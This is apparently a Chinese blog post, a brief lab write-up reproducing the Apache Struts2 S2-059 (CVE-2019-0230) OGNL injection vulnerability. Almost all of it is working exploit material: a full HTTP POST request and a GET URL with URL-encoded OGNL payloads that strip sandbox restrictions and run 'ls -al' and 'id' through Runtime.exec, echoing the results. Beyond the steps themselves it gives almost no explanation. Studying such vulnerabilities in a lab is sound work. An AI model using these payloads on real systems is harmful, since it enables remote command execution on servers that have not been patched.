Struts2-059 远程代码执行漏洞(CVE-2019-0230)

从网上找测试环境,有现成的靶场,直接启动就好了。

抓包

修改poc

输入ONGL表达式%{1+4},需要url转码%25%7b%31%2b%34%7d%0a

这里发送一个post包即可

POST /index.action HTTP/1.1
Host: 144.76.229.247:50766
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 583
Origin: http://144.76.229.247:50766
Connection: close
Referer: http://144.76.229.247:50766/index.action
Cookie: JSESSIONID=5A2789AD2201910479CC5592086C250A
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 10.8.14.51
X-Originating-IP: 10.8.14.51
X-Remote-IP: 10.8.14.51
X-Remote-Addr: 10.8.14.51

skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20-al').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d

直接访问:

http://144.76.229.247:50766/index.action?skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec(%27id%27).getInputStream()).useDelimiter(%27%5C%5C%5C%5CA%27)%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A%27%27%2C%23res.print(%23str)%2C%23res.close()%0A%7d

大概就这些啦......

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注